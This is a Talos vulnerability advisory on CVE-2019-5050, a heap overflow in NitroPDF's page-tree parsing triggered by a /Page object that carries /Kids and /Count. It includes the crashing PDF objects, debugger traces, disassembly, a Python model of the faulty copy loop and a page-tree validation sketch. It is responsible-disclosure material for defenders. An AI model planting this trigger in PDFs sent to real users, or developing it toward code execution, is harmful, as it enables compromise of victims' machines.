Talos Vulnerability Report

TALOS-2019-0819

NitroPDF Page Kids Remote Code Execution Vulnerability

October 9, 2019

CVE Number

CVE-2019-5050

Summary

A specially crafted PDF file can lead to heap corruption when opened in NitroPDF 12.12.1.522. With careful memory manipulation, this can lead to arbitrary code execution. To trigger this vulnerability, the victim would need to open the malicious file.

Tested Versions

NitroPDF 12.12.1.522

Product URLs

https://www.gonitro.com/

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-122: Heap-based Buffer Overflow

Details

A potential remote code execution vulnerability exists in the PDF parsing functionality of Nitro Pro. A specially crafted PDF file can trigger this vulnerability, resulting in potential code execution.

While parsing the page tree of a PDF document, a parser confusion can cause a /Page object to be treated as a /Pages object. Normally, a /Pages object contains a /Kids array whose entries can themselves be of type /Pages or /Page, while a /Page object is supposed to define the contents of a single page. In NitroPDF, when a /Page object wrongly contains a /Kids array along with a /Count value specifying the number of expected kid objects, it is parsed as a /Pages object. Additionally, if there is a discrepancy between the objects actually present in the document, the number of objects in the /Kids array, and the value of /Count, an out-of-bounds memory access on the heap can be triggered. The following part of the PDF document causes a crash:

2 0 obj
<< 
/Count 1
/Kids [  3 0 R ] 
>> 
endobj

3 0 obj
<< 
/Type /Page
/Count 20
/Kids [ 4 0 R ] 
>> 
endobj

Object 2 0 is a proper /Pages object and points to 3 0 as its /Kids entry. Object 3 0 in turn declares itself to be of type /Page instead of /Pages, but still has both /Kids and /Count. Parsing this in NitroPDF results in the following crash:

(3d18.6774): Access violation - code c0000005 (!!! second chance !!!)
npdf!PDDocUpdateTextCache+0x5400:
00007ff9`1dee6890 410f1001        movups  xmm0,xmmword ptr [r9] ds:000001be`3fc211c0=????????????????????????????????
0:000> k 5
 # Child-SP          RetAddr           Call Site
00 00000030`f49fe090 00007ff9`1ded52b4 npdf!PDDocUpdateTextCache+0x5400
01 00000030`f49fe0d0 00007ff9`1dedbfba npdf!PDWordFinderReleaseWordList+0x10d44
02 00000030`f49fe210 00007ff9`1deeadee npdf!PDDocAcquirePage+0x3a
03 00000030`f49fe260 00007ff9`1dee6de3 npdf!PDDocUpdateTextCache+0x995e
04 00000030`f49fe2a0 00007ff9`1dee0811 npdf!PDDocUpdateTextCache+0x5953

The above crash is due to a read access to invalid memory pointed to by r9. If we take a look at the rest of the crashing basic block, we can see:

.text:00000001803C6890 movups  xmm0, xmmword ptr [r9]
.text:00000001803C6894 add     r9, 18h
.text:00000001803C6898 add     rax, 18h
.text:00000001803C689C movups  xmmword ptr [rax-18h], xmm0
.text:00000001803C68A0 movsd   xmm1, qword ptr [r9-8]
.text:00000001803C68A6 movsd   qword ptr [rax-8], xmm1
.text:00000001803C68AB cmp     r9, rcx
.text:00000001803C68AE jnz     short loc_1803C6890

The above code is essentially a loop that copies contents from the memory pointed to by r9 to the buffer pointed to by rax. In each iteration, both addresses are increased by 0x18. So, we have a case of an out-of-bounds read followed directly by a write. The initial out-of-bounds value in r9 is actually the 4th argument to this function, and rax comes, indirectly, from the 3rd. If we step back to the point where this function is called, we can see the following in the r9 and r8 registers (source and destination, respectively):

npdf!PDWordFinderReleaseWordList+0x10d3f:
00007ff9`1ded52af e87c150100      call    npdf!PDDocUpdateTextCache+0x53a0 (00007ff9`1dee6830)
0:000> ?r8
Evaluate expression: 1863222632440 = 000001b1`d0b91ff8
0:000> ?r9
Evaluate expression: 1863222632896 = 000001b1`d0b921c0
0:000> dd r9
000001b1`d0b921c0  ???????? ???????? ???????? ????????
000001b1`d0b921d0  ???????? ???????? ???????? ????????
000001b1`d0b921e0  ???????? ???????? ???????? ????????
000001b1`d0b921f0  ???????? ???????? ???????? ????????
000001b1`d0b92200  ???????? ???????? ???????? ????????
000001b1`d0b92210  ???????? ???????? ???????? ????????
000001b1`d0b92220  ???????? ???????? ???????? ????????
000001b1`d0b92230  ???????? ???????? ???????? ????????

So, when the function is called for the first time, the register r9 already points out of bounds to invalid memory. The code just prior to this function call actually calculates the offset which causes an out of bounds heap access:

00007ff9`1ded5286 488b4628        mov     rax,qword ptr [rsi+28h]
00007ff9`1ded528a 8bcb            mov     ecx,ebx
00007ff9`1ded528c 48ffc1          inc     rcx
00007ff9`1ded528f 488d1449        lea     rdx,[rcx+rcx*2]                   [1]
00007ff9`1ded5293 4c8d0cd0        lea     r9,[rax+rdx*8]                    [2]
00007ff9`1ded5297 8b5c2440        mov     ebx,dword ptr [rsp+40h]
00007ff9`1ded529b 488d0c5b        lea     rcx,[rbx+rbx*2]                   [3]
00007ff9`1ded529f 4c8d04c8        lea     r8,[rax+rcx*8]                    [4]
00007ff9`1ded52a3 488d942488000000 lea     rdx,[rsp+88h]
00007ff9`1ded52ab 488d4e28        lea     rcx,[rsi+28h]
00007ff9`1ded52af e87c150100      call    npdf!PDDocUpdateTextCache+0x53a0 (00007ff9`1dee6830)

At [1] above, the index into the array is calculated into rdx. The value in rcx comes directly from the /Count value in the object. Then at [2], the offset into the memory array is calculated, and r9 receives its final value. Together, [1] and [2] compute rax + rcx * 0x18, which matches the 0x18-byte stride of the copy loop. The destination pointer is calculated similarly at [3] and [4], except that the value in ebx represents the number of valid /Page objects found so far.
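
The address arithmetic and the copy loop it feeds can be modelled with a short Python sketch. This is an illustration only, not code recovered from npdf: the names element_address, copy_elements and AccessViolation are hypothetical, memory is modelled as a bytearray indexed by offset, and the loop's end pointer (rcx in the loop) is assumed to mark the end of the source range. The r8 and r9 values are taken from the debugger output; the indexes 21 and 2 used in the second half are an inference that happens to match the observed 19-element distance, not values shown in the report.

```python
ELEM_SIZE = 0x18  # 24-byte elements: 16 bytes (movups) + 8 bytes (movsd)


class AccessViolation(Exception):
    """Stands in for the fault raised when memory outside the buffer is touched."""


def element_address(base: int, index: int) -> int:
    """Return base + index * 0x18, computed the way the two lea instructions do."""
    tripled = index + index * 2   # lea rdx,[rcx+rcx*2]
    return base + tripled * 8     # lea r9,[rax+rdx*8]


def copy_elements(mem: bytearray, src: int, dst: int, end: int) -> int:
    """Model of the crashing loop; returns the number of elements copied.

    Simplification: the whole 24-byte element is bounds-checked up front,
    whereas the real code faults on the first 16-byte movups read.
    """
    copied = 0
    while True:  # do-while shape: the body runs before `cmp r9, rcx`
        if src + ELEM_SIZE > len(mem):
            raise AccessViolation(f"read past buffer at offset {src:#x}")
        if dst + ELEM_SIZE > len(mem):
            raise AccessViolation(f"write past buffer at offset {dst:#x}")
        mem[dst:dst + 16] = mem[src:src + 16]   # movups load + store
        src += ELEM_SIZE
        dst += ELEM_SIZE
        mem[dst - 8:dst] = mem[src - 8:src]     # movsd load + store
        copied += 1
        if src == end:
            return copied


# Register values from the debugger output at the call site.
R8 = 0x000001B1D0B91FF8  # destination
R9 = 0x000001B1D0B921C0  # source
print((R9 - R8) // ELEM_SIZE)  # 19 elements between destination and source

# Hypothetical layout: room for three elements, /Count of 20, two valid pages.
array = bytearray(3 * ELEM_SIZE)
src = element_address(0, 20 + 1)   # inc rcx, then [1] and [2]
dst = element_address(0, 2)        # [3] and [4]
try:
    copy_elements(array, src, dst, end=len(array))
except AccessViolation as fault:
    print("fault:", fault)
```

In this model the source offset computed from /Count already lies beyond the buffer before the first iteration, which mirrors the observation that r9 is invalid when the function is entered.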

It should be noted that this parser confusion can be nested any number of levels deep in the page tree, which influences the memory layout and pointer arithmetic. By manipulating this layout, along with the valid /Page and other objects in the PDF document, this bug can result in arbitrary out-of-bounds memory access. By carefully controlling the memory contents adjacent to the overflowed chunk, this overflow can potentially be abused to overwrite adjacent heap memory, which can ultimately lead to arbitrary code execution.
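
The kind of consistency check whose absence the analysis above implies can be sketched as follows. This is a minimal illustration, not NitroPDF's code or a vendor fix: the dictionary-based object model and the names count_leaves and check_page_tree are hypothetical, and a node without /Type is treated as /Pages only because object 2 0 in the sample omits it.

```python
def count_leaves(objects, num, problems, seen):
    """Return the number of leaf pages under object `num`, recording problems."""
    if num in seen:
        problems.append(f"object {num}: cycle in page tree")
        return 0
    seen = seen | {num}  # new set per branch, so siblings are not affected
    node = objects.get(num)
    if node is None:
        problems.append(f"object {num}: referenced but not present")
        return 0
    if node.get("Type") == "Page":
        # A leaf must never be walked as an intermediate node.
        if "Kids" in node or "Count" in node:
            problems.append(f"object {num}: /Page carries /Kids or /Count")
        return 1
    leaves = sum(
        count_leaves(objects, kid, problems, seen) for kid in node.get("Kids", [])
    )
    if node.get("Count") != leaves:
        problems.append(
            f"object {num}: /Count is {node.get('Count')} but {leaves} leaf pages found"
        )
    return leaves


def check_page_tree(objects, root):
    """Walk the page tree from `root` and return a list of inconsistencies."""
    problems = []
    count_leaves(objects, root, problems, set())
    return problems


# The two objects from the sample document, modelled as plain dictionaries.
sample = {
    2: {"Count": 1, "Kids": [3]},
    3: {"Type": "Page", "Count": 20, "Kids": [4]},
}
for problem in check_page_tree(sample, 2):
    print(problem)
```

Because the walk is recursive and stops at every /Page node, the same check applies when the confusion is nested several levels deep in the tree.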

Timeline

2019-05-07 - Vendor disclosure
2019-07-02 - 60 day follow up
2019-07-29 - 2nd follow up (90 days approaching notice)
2019-08-06 - 3rd follow up
2019-08-07 - Vendor acknowledged & advised prior emails went to spam folder; Talos issued copy of report
2019-09-03 - Talos granted disclosure extension to 2019-09-10
2019-09-05 - Vendor advised issues will be addressed in a future release (timeline unknown)
2019-10-09 - Public Disclosure

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.